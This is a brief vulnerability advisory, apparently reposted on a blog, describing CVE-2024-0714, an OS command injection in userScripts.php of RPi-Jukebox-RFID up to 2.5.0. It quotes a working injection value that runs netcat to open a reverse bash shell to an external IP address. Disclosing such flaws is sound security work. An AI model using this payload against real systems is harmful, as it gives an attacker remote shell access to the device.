• caglararli@hotmail.com
  • 05386281520

CVE-2024-0714 | MiczFlor RPi-Jukebox-RFID up to 2.5.0 HTTP Request userScripts.php folder os command injection

Çağlar Arlı      -    23 Views

CVE-2024-0714 | MiczFlor RPi-Jukebox-RFID up to 2.5.0 HTTP Request userScripts.php folder os command injection

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. This vulnerability is handled as CVE-2024-0714. The attack may be launched remotely. Furthermore, there is an exploit available. The vendor was contacted early about this disclosure but did not respond in any way.